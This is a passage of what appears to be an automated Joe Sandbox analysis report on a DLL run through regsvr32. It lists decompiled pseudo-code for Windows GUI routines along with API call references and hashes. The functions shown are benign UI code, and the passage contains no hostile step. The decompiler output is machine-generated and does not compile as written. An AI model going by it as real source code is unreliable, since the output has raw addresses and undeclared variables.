                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,Function_00020C3C,00000000), ref: 100212A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                • String ID: MS Shell Dlg
                                                                                                                • API String ID: 1736106359-76309092
                                                                                                                • Opcode ID: 2bd783e259b33e7d17dff3db59fcb4434885c89f19cf30252cc6289074b54053
                                                                                                                • Instruction ID: f0c0048961803a188d9479126d767246e806f03dac1e22d9f8db8e56780ddc43
                                                                                                                • Opcode Fuzzy Hash: 2bd783e259b33e7d17dff3db59fcb4434885c89f19cf30252cc6289074b54053
                                                                                                                • Instruction Fuzzy Hash: DB51CC38900109DFCB01DFA8DC859EEBBB5EF14340FA44669F852EB192DB709E95CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E1000BA10(void* __ecx, intOrPtr* _a8) {
                                                                                                                				struct tagPOINT _v8;
                                                                                                                				signed char _v12;
                                                                                                                				signed char _v24;
                                                                                                                				intOrPtr* _t25;
                                                                                                                				long _t26;
                                                                                                                				void* _t27;
                                                                                                                				long _t38;
                                                                                                                				long _t56;
                                                                                                                				void* _t57;
                                                                                                                
                                                                                                                				_t57 = __ecx;
                                                                                                                				GetCursorPos( &_v8);
                                                                                                                				ScreenToClient( *(_t57 + 0x570),  &_v8);
                                                                                                                				_t58 = _t57 + 0x550;
                                                                                                                				_t38 = E1002644D(_t57 + 0x550, _v8.x, _v8.y,  &_v12);
                                                                                                                				if((_v24 & 0x00000040) == 0) {
                                                                                                                					L7:
                                                                                                                					if((_v12 & 0x00000010) == 0) {
                                                                                                                						_t25 = _a8;
                                                                                                                						 *_t25 = 0;
                                                                                                                						return _t25;
                                                                                                                					} else {
                                                                                                                						_t26 = SendMessageA( *(_t57 + 0x570), 0x110b, 9, _t38);
                                                                                                                						 *_a8 = 0;
                                                                                                                						return _t26;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t27 = E10026483(_t58, _t38);
                                                                                                                				_push(_t38);
                                                                                                                				_push(9);
                                                                                                                				_push(0x110b);
                                                                                                                				_push( *(_t57 + 0x570));
                                                                                                                				if(_t27 == 0) {
                                                                                                                					SendMessageA();
                                                                                                                					E1000B9A0(_t57, _t38, E10026483(_t58, _t38));
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				SendMessageA();
                                                                                                                				E1000B9A0(_t57, _t38, E10026483(_t58, _t38));
                                                                                                                				_t56 = SendMessageA( *(_t57 + 0x570), 0x110a, 3, _t38);
                                                                                                                				if(_t56 == 0) {
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					E100264BC(_t58, _t56, 0);
                                                                                                                					_t56 = SendMessageA( *(_t57 + 0x570), 0x110a, 3, _t56);
                                                                                                                				} while (_t56 != 0);
                                                                                                                				goto L7;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 1000BA1E
                                                                                                                • ScreenToClient.USER32(?,?), ref: 1000BA30
                                                                                                                  • Part of subcall function 1002644D: SendMessageA.USER32 ref: 1002646D
                                                                                                                • SendMessageA.USER32 ref: 1000BB04
                                                                                                                  • Part of subcall function 10026483: SendMessageA.USER32 ref: 100264AB
                                                                                                                • SendMessageA.USER32 ref: 1000BAA2
                                                                                                                  • Part of subcall function 100264BC: SendMessageA.USER32 ref: 100264F3
                                                                                                                • SendMessageA.USER32 ref: 1000BAC9
                                                                                                                • SendMessageA.USER32 ref: 1000BA80
                                                                                                                  • Part of subcall function 1000B9A0: SendMessageA.USER32 ref: 1000B9B7
                                                                                                                  • Part of subcall function 1000B9A0: SendMessageA.USER32 ref: 1000B9F7
                                                                                                                • SendMessageA.USER32 ref: 1000BAD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientCursorScreen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 41388912-2766056989
                                                                                                                • Opcode ID: c548239c1e9cad7334d0ffe076fdfb4e2767bc8ccbfcea1d6b00597f901cca94
                                                                                                                • Instruction ID: ca4faaaaeda8ceb0eeefa278f4bf7c19089cac7d599f38745f788febe4b2ceec
                                                                                                                • Opcode Fuzzy Hash: c548239c1e9cad7334d0ffe076fdfb4e2767bc8ccbfcea1d6b00597f901cca94
                                                                                                                • Instruction Fuzzy Hash: E1319075240B05ABE355DF24EC91FABB3ECEB88791F00041CFA4A97285EA64E9098761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10035322(intOrPtr __ecx, signed int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v40;
                                                                                                                				void _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t12;
                                                                                                                				void* _t14;
                                                                                                                				char* _t23;
                                                                                                                				void* _t29;
                                                                                                                				signed short _t30;
                                                                                                                				struct HDC__* _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t12 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t12 ^ _t32;
                                                                                                                				_t31 = GetStockObject;
                                                                                                                				_t30 = 0xa;
                                                                                                                				_v72 = __ecx;
                                                                                                                				_t23 = "System";
                                                                                                                				_t14 = GetStockObject(0x11);
                                                                                                                				if(_t14 != 0) {
                                                                                                                					L2:
                                                                                                                					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                                						_t23 =  &_v40;
                                                                                                                						_t31 = GetDC(0);
                                                                                                                						if(_v68 < 0) {
                                                                                                                							_v68 =  ~_v68;
                                                                                                                						}
                                                                                                                						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                                						ReleaseDC(0, _t31);
                                                                                                                					}
                                                                                                                					L6:
                                                                                                                					_t16 = _a4;
                                                                                                                					if(_a4 == 0) {
                                                                                                                						_t16 = _t30 & 0x0000ffff;
                                                                                                                					}
                                                                                                                					return E1003B437(E100351D3(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                				}
                                                                                                                				_t14 = GetStockObject(0xd);
                                                                                                                				if(_t14 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000011), ref: 10035348
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 10035350
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 1003535D
                                                                                                                • GetDC.USER32(00000000), ref: 1003536C
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10035380
                                                                                                                • MulDiv.KERNEL32 ref: 1003538C
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10035398
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                • String ID: System
                                                                                                                • API String ID: 46613423-3470857405
                                                                                                                • Opcode ID: 0fd600e30f56e7e9ec9132b7e3b8a86ccef4c833f876d3372f946b32b9eb9cec
                                                                                                                • Instruction ID: b7d3908059a76e69d86433333f5f6da8d47bedefbba8974e8e49f0fc4b6b577f
                                                                                                                • Opcode Fuzzy Hash: 0fd600e30f56e7e9ec9132b7e3b8a86ccef4c833f876d3372f946b32b9eb9cec
                                                                                                                • Instruction Fuzzy Hash: 04114271A40268EBEB10DBA1DC85FAE77B8EB08782F050019F605AB1D1DBB19D019B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10002D70(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                                                                				struct HWND__* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char _t129;
                                                                                                                				signed int* _t130;
                                                                                                                				signed int* _t132;
                                                                                                                				signed int* _t134;
                                                                                                                				signed int* _t136;
                                                                                                                				signed int* _t138;
                                                                                                                				signed int _t141;
                                                                                                                				void* _t142;
                                                                                                                				signed int _t145;
                                                                                                                				signed int _t148;
                                                                                                                				void* _t149;
                                                                                                                				signed int _t152;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t165;
                                                                                                                				signed int _t167;
                                                                                                                				void* _t168;
                                                                                                                				void* _t171;
                                                                                                                				void* _t176;
                                                                                                                				signed char _t201;
                                                                                                                				signed char _t206;
                                                                                                                				signed int* _t207;
                                                                                                                				signed int _t221;
                                                                                                                				signed int _t222;
                                                                                                                				signed int _t223;
                                                                                                                				signed int _t224;
                                                                                                                				signed char _t228;
                                                                                                                				intOrPtr _t229;
                                                                                                                				intOrPtr _t231;
                                                                                                                				intOrPtr _t233;
                                                                                                                				intOrPtr _t235;
                                                                                                                				intOrPtr _t237;
                                                                                                                				void* _t239;
                                                                                                                				void* _t241;
                                                                                                                				void* _t243;
                                                                                                                				void* _t244;
                                                                                                                				signed char _t259;
                                                                                                                				void* _t270;
                                                                                                                				signed char _t285;
                                                                                                                				signed char _t290;
                                                                                                                				void* _t295;
                                                                                                                				signed int _t296;
                                                                                                                				intOrPtr _t297;
                                                                                                                
                                                                                                                				_t220 = __ebx;
                                                                                                                				_t297 = _a4;
                                                                                                                				_t129 =  *(_t297 + 0x18);
                                                                                                                				_t295 = __ecx;
                                                                                                                				_t228 =  !_t129;
                                                                                                                				_t301 = _t228 & 0x00000001;
                                                                                                                				if((_t228 & 0x00000001) == 0) {
                                                                                                                					__eflags = _t129 & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(__ebx, _t270, __ecx, _t297, __eflags);
                                                                                                                					}
                                                                                                                					_t130 =  *(_t297 + 0x28);
                                                                                                                					_t229 =  *((intOrPtr*)(_t297 + 0x2c));
                                                                                                                					_t271 =  &(_t130[1]);
                                                                                                                					__eflags =  &(_t130[1]) - _t229;
                                                                                                                					if( &(_t130[1]) > _t229) {
                                                                                                                						__eflags = _t130 - _t229 + 4;
                                                                                                                						E1001FADC(_t297, _t271, _t130 - _t229 + 4);
                                                                                                                					}
                                                                                                                					 *(_t295 + 0x84) =  *( *(_t297 + 0x28));
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					__eflags =  *(_t297 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
                                                                                                                					}
                                                                                                                					_t132 =  *(_t297 + 0x28);
                                                                                                                					_t231 =  *((intOrPtr*)(_t297 + 0x2c));
                                                                                                                					_t272 =  &(_t132[1]);
                                                                                                                					__eflags =  &(_t132[1]) - _t231;
                                                                                                                					if( &(_t132[1]) > _t231) {
                                                                                                                						__eflags = _t132 - _t231 + 4;
                                                                                                                						E1001FADC(_t297, _t272, _t132 - _t231 + 4);
                                                                                                                					}
                                                                                                                					 *(_t295 + 0x74) =  *( *(_t297 + 0x28));
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					__eflags =  *(_t297 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
                                                                                                                					}
                                                                                                                					_t134 =  *(_t297 + 0x28);
                                                                                                                					_t233 =  *((intOrPtr*)(_t297 + 0x2c));
                                                                                                                					_t273 =  &(_t134[1]);
                                                                                                                					__eflags =  &(_t134[1]) - _t233;
                                                                                                                					if( &(_t134[1]) > _t233) {
                                                                                                                						__eflags = _t134 - _t233 + 4;
                                                                                                                						E1001FADC(_t297, _t273, _t134 - _t233 + 4);
                                                                                                                					}
                                                                                                                					 *(_t295 + 0x78) =  *( *(_t297 + 0x28));
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					__eflags =  *(_t297 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
                                                                                                                					}
                                                                                                                					_t136 =  *(_t297 + 0x28);
                                                                                                                					_t235 =  *((intOrPtr*)(_t297 + 0x2c));
                                                                                                                					_t274 =  &(_t136[1]);
                                                                                                                					__eflags =  &(_t136[1]) - _t235;
                                                                                                                					if( &(_t136[1]) > _t235) {
                                                                                                                						__eflags = _t136 - _t235 + 4;
                                                                                                                						E1001FADC(_t297, _t274, _t136 - _t235 + 4);
                                                                                                                					}
                                                                                                                					 *(_t295 + 0x7c) =  *( *(_t297 + 0x28));
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					__eflags =  *(_t297 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
                                                                                                                					}
                                                                                                                					_t138 =  *(_t297 + 0x28);
                                                                                                                					_t237 =  *((intOrPtr*)(_t297 + 0x2c));
                                                                                                                					_t275 =  &(_t138[1]);
                                                                                                                					__eflags =  &(_t138[1]) - _t237;
                                                                                                                					if( &(_t138[1]) > _t237) {
                                                                                                                						__eflags = _t138 - _t237 + 4;
                                                                                                                						E1001FADC(_t297, _t275, _t138 - _t237 + 4);
                                                                                                                					}
                                                                                                                					 *(_t295 + 0x80) =  *( *(_t297 + 0x28));
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					_t141 =  *(_t295 + 0x84);
                                                                                                                					__eflags = _t141;
                                                                                                                					_t239 = _t295;
                                                                                                                					if(_t141 == 0) {
                                                                                                                						_t142 = E1001D1C2(_t239, 0x3fb);
                                                                                                                						_push(0);
                                                                                                                						_push(1);
                                                                                                                						_push(0xf1);
                                                                                                                						_push( *((intOrPtr*)(_t142 + 0x20)));
                                                                                                                						goto L47;
                                                                                                                					} else {
                                                                                                                						__eflags = _t141 == 1;
                                                                                                                						if(_t141 == 1) {
                                                                                                                							_t176 = E1001D1C2(_t239, 0x3fc);
                                                                                                                							_push(0);
                                                                                                                							_push(1);
                                                                                                                							_push(0xf1);
                                                                                                                							_push( *((intOrPtr*)(_t176 + 0x20)));
                                                                                                                							L47:
                                                                                                                							SendMessageA();
                                                                                                                						} else {
                                                                                                                							E10018B24(_t239, 0x10056cf8, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t145 =  *(_t295 + 0x74);
                                                                                                                					__eflags = _t145 - 3;
                                                                                                                					if(_t145 > 3) {
                                                                                                                						E10018B24(_t295, 0x10056cf8, 0, 0);
                                                                                                                					} else {
                                                                                                                						switch( *((intOrPtr*)(_t145 * 4 +  &M100031C0))) {
                                                                                                                							case 0:
                                                                                                                								SendMessageA( *(E1001D1C2(_t295, 0x3f7) + 0x20), 0xf1, 1, 0);
                                                                                                                								goto L55;
                                                                                                                							case 1:
                                                                                                                								__ecx = __edi;
                                                                                                                								__eax = E1001D1C2(__ecx, 0x3f8);
                                                                                                                								__edx =  *(__eax + 0x20);
                                                                                                                								__eax = SendMessageA( *(__eax + 0x20), 0xf1, 1, 0);
                                                                                                                								goto L55;
                                                                                                                							case 2:
                                                                                                                								__ecx = __edi;
                                                                                                                								__eax = E1001D1C2(__ecx, 0x3f9);
                                                                                                                								__eax = SendMessageA(__eax, 0xf1, 1, 0);
                                                                                                                								goto L55;
                                                                                                                							case 3:
                                                                                                                								__ecx = __edi;
                                                                                                                								__ecx =  *(E1001D1C2(__edi, 0x3fa) + 0x20);
                                                                                                                								__eax = SendMessageA(__ecx, 0xf1, 1, 0);
                                                                                                                								goto L55;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L55:
                                                                                                                					_t148 =  *(_t295 + 0x78);
                                                                                                                					__eflags = _t148;
                                                                                                                					_t241 = _t295;
                                                                                                                					if(_t148 == 0) {
                                                                                                                						_t149 = E1001D1C2(_t241, 0x3fd);
                                                                                                                						_push(0);
                                                                                                                						_push(1);
                                                                                                                						_push(0xf1);
                                                                                                                						_push( *((intOrPtr*)(_t149 + 0x20)));
                                                                                                                						goto L62;
                                                                                                                					} else {
                                                                                                                						_t167 = _t148 - 1;
                                                                                                                						__eflags = _t167;
                                                                                                                						if(_t167 == 0) {
                                                                                                                							_t168 = E1001D1C2(_t241, 0x3fe);
                                                                                                                							_push(0);
                                                                                                                							_push(1);
                                                                                                                							_push(0xf1);
                                                                                                                							_push( *((intOrPtr*)(_t168 + 0x20)));
                                                                                                                							goto L62;
                                                                                                                						} else {
                                                                                                                							__eflags = _t167 == 2;
                                                                                                                							if(_t167 == 2) {
                                                                                                                								_t171 = E1001D1C2(_t241, 0x3ff);
                                                                                                                								_push(0);
                                                                                                                								_push(1);
                                                                                                                								_push(0xf1);
                                                                                                                								_push( *((intOrPtr*)(_t171 + 0x20)));
                                                                                                                								L62:
                                                                                                                								SendMessageA();
                                                                                                                							} else {
                                                                                                                								E10018B24(_t241, 0x10056cf8, 0, 0);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t152 =  *(_t295 + 0x7c);
                                                                                                                					__eflags = _t152;
                                                                                                                					_t243 = _t295;
                                                                                                                					if(_t152 == 0) {
                                                                                                                						_t153 = E1001D1C2(_t243, 0x3f5);
                                                                                                                						_push(0);
                                                                                                                						_push(1);
                                                                                                                						_push(0xf1);
                                                                                                                						_push( *((intOrPtr*)(_t153 + 0x20)));
                                                                                                                						goto L68;
                                                                                                                					} else {
                                                                                                                						__eflags = _t152 == 1;
                                                                                                                						if(_t152 == 1) {
                                                                                                                							_t165 = E1001D1C2(_t243, 0x3f6);
                                                                                                                							_push(0);
                                                                                                                							_push(1);
                                                                                                                							_push(0xf1);
                                                                                                                							_push( *((intOrPtr*)(_t165 + 0x20)));
                                                                                                                							L68:
                                                                                                                							SendMessageA();
                                                                                                                						} else {
                                                                                                                							E10018B24(_t243, 0x10056cf8, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t157 =  *(_t295 + 0x80);
                                                                                                                					__eflags = _t157;
                                                                                                                					_t244 = _t295;
                                                                                                                					if(_t157 == 0) {
                                                                                                                						return SendMessageA( *(E1001D1C2(_t244, 0x400) + 0x20), 0xf1, 1, 0);
                                                                                                                					} else {
                                                                                                                						__eflags = _t157 == 1;
                                                                                                                						if(_t157 == 1) {
                                                                                                                							return SendMessageA( *(E1001D1C2(_t244, 0x401) + 0x20), 0xf1, 1, 0);
                                                                                                                						} else {
                                                                                                                							return E10018B24(_t244, 0x10056cf8, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(__ebx);
                                                                                                                					_push(1);
                                                                                                                					E1001956C(__ecx, __ecx, _t297, _t301);
                                                                                                                					_push(0);
                                                                                                                					E1001956C(__ecx, __ecx, _t297, _t301);
                                                                                                                					_t221 =  *(__ecx + 0x84);
                                                                                                                					_t285 =  !( *(_t297 + 0x18));
                                                                                                                					_t302 = _t285 & 0x00000001;
                                                                                                                					if((_t285 & 0x00000001) == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(2);
                                                                                                                						E10020287(_t221, _t285, __ecx, _t297, _t302);
                                                                                                                					}
                                                                                                                					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
                                                                                                                						E1001FA65(_t297);
                                                                                                                					}
                                                                                                                					_t286 =  *(_t297 + 0x28);
                                                                                                                					 *( *(_t297 + 0x28)) = _t221;
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					_t222 =  *(_t295 + 0x74);
                                                                                                                					_t201 =  !( *(_t297 + 0x18));
                                                                                                                					_t304 = _t201 & 0x00000001;
                                                                                                                					if((_t201 & 0x00000001) == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(2);
                                                                                                                						E10020287(_t222, _t286, _t295, _t297, _t304);
                                                                                                                					}
                                                                                                                					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
                                                                                                                						E1001FA65(_t297);
                                                                                                                					}
                                                                                                                					 *( *(_t297 + 0x28)) = _t222;
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					_t223 =  *(_t295 + 0x78);
                                                                                                                					_t259 =  !( *(_t297 + 0x18));
                                                                                                                					_t306 = _t259 & 0x00000001;
                                                                                                                					if((_t259 & 0x00000001) == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(2);
                                                                                                                						E10020287(_t223,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, _t306);
                                                                                                                					}
                                                                                                                					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
                                                                                                                						E1001FA65(_t297);
                                                                                                                					}
                                                                                                                					 *( *(_t297 + 0x28)) = _t223;
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					_t224 =  *(_t295 + 0x7c);
                                                                                                                					_t290 =  !( *(_t297 + 0x18));
                                                                                                                					_t308 = _t290 & 0x00000001;
                                                                                                                					if((_t290 & 0x00000001) == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(2);
                                                                                                                						E10020287(_t224, _t290, _t295, _t297, _t308);
                                                                                                                					}
                                                                                                                					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
                                                                                                                						E1001FA65(_t297);
                                                                                                                					}
                                                                                                                					_t291 =  *(_t297 + 0x28);
                                                                                                                					 *( *(_t297 + 0x28)) = _t224;
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					_t296 =  *(_t295 + 0x80);
                                                                                                                					_t206 =  !( *(_t297 + 0x18));
                                                                                                                					_t310 = _t206 & 0x00000001;
                                                                                                                					if((_t206 & 0x00000001) == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t297 + 0x14)));
                                                                                                                						_push(2);
                                                                                                                						E10020287(_t224, _t291, _t296, _t297, _t310);
                                                                                                                					}
                                                                                                                					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
                                                                                                                						E1001FA65(_t297);
                                                                                                                					}
                                                                                                                					_t207 =  *(_t297 + 0x28);
                                                                                                                					 *_t207 = _t296;
                                                                                                                					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
                                                                                                                					return _t207;
                                                                                                                				}
                                                                                                                			}

                                                                                                                0x10002e6a
                                                                                                                0x10002e70
                                                                                                                0x10002e72
                                                                                                                0x10002e74
                                                                                                                0x10002e79
                                                                                                                0x10002e7a
                                                                                                                0x10002e7c
                                                                                                                0x10002e7c
                                                                                                                0x10002e89
                                                                                                                0x10002e8d
                                                                                                                0x10002e8d
                                                                                                                0x10002e92
                                                                                                                0x10002e96
                                                                                                                0x10002e98
                                                                                                                0x10002e9e
                                                                                                                0x10002e9e

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001956C: __EH_prolog3_catch.LIBCMT ref: 10019573
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                • SendMessageA.USER32 ref: 10003007
                                                                                                                • SendMessageA.USER32 ref: 10003031
                                                                                                                  • Part of subcall function 1001D1C2: GetDlgItem.USER32(?,?), ref: 1001D1CF
                                                                                                                • SendMessageA.USER32 ref: 1000304E
                                                                                                                • SendMessageA.USER32 ref: 10003109
                                                                                                                • SendMessageA.USER32 ref: 1000315A
                                                                                                                • SendMessageA.USER32 ref: 10003199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3H_prolog3_catchItemThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2494371950-0
                                                                                                                • Opcode ID: b5af775a6a57946f8b23923aa4f0b59214164ec59136e5b9549812102d34fc19
                                                                                                                • Instruction ID: ddd1a69a171d0d2141de40e4f7bce56bfba829fa2563aceb89071714a0287f58
                                                                                                                • Opcode Fuzzy Hash: b5af775a6a57946f8b23923aa4f0b59214164ec59136e5b9549812102d34fc19
                                                                                                                • Instruction Fuzzy Hash: 9DD1C674780702AFE225DB54CC92F6AB7E6EF48750F10461DF28A5F6D5CAB4F8818B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000CD90(void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t47;
                                                                                                                				intOrPtr _t50;
                                                                                                                				unsigned int _t54;
                                                                                                                				intOrPtr* _t65;
                                                                                                                				long** _t74;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                				signed int _t95;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t107;
                                                                                                                				void* _t109;
                                                                                                                				void* _t111;
                                                                                                                				signed int _t113;
                                                                                                                				signed int _t115;
                                                                                                                				void* _t116;
                                                                                                                				signed int _t117;
                                                                                                                				void* _t119;
                                                                                                                				intOrPtr* _t123;
                                                                                                                
                                                                                                                				_t119 = __eflags;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051B38);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				E1003BF10(0x1218);
                                                                                                                				_t45 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t115 + 0x1214) = _t45 ^ _t115;
                                                                                                                				_t47 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t47 ^ _t115);
                                                                                                                				 *[fs:0x0] = _t115 + 0x122c;
                                                                                                                				_t50 = E100160BC(_t119, 0x14);
                                                                                                                				_t116 = _t115 + 4;
